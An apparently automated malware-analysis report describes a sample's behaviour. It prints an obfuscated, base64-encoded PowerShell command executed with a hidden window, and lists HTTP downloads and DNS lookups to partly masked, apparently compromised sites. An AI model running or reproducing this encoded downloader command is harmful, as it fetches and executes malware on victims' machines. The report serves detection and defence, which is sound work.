Technical Information
Malicious functions
Executes the following (exploit)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABZAF8ANAB5AHcAdAB1AD0AKAAnAEUAJwArACcANwA4ACcAKwAoACcAbAAnACsAJwA1AG8AZgAnACkAKQA7AC4AKAAnAG4AZQB3AC0AaQAnACsAJwB0AGUAJwArACcAbQAnACkAIAAkAEUATgBWADoAdQBzAGUAUgBQAHIAbwBGAEkATABFAFwAcgBiAE...
Network activity
TCP
HTTP GET requests
- http://ed####edoors.com/wp-includes/nN/
- http://el###falgar.com/wp-includes/uYK/
- http://el###ivers.com/tpv/DXo/
- http://en####ofutbol.com/C2/
- http://fc#.net/wentzville/maK/
- http://ea####ipping.com/cgi-bin/Ym/
UDP
- DNS ASK ed####edoors.com
- DNS ASK el###falgar.com
- DNS ASK el###ivers.com
- DNS ASK en####ofutbol.com
- DNS ASK fc#.net
- DNS ASK fl#####quitectura.com
- DNS ASK ea####ipping.com
Miscellaneous
Creates and executes the following
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABZAF8ANAB5AHcAdAB1AD0AKAAnAEUAJwArACcANwA4ACcAKwAoACcAbAAnACsAJwA1AG8AZgAnACkAKQA7AC4AKAAnAG4AZQB3AC0AaQAnACsAJwB0AGUAJwArACcAbQAnACkAIAAkAEUATgBWADoAdQBzAGUAUgBQAHIAbwBGAEkATABFAFwAcgBiAE...' (with hidden window)
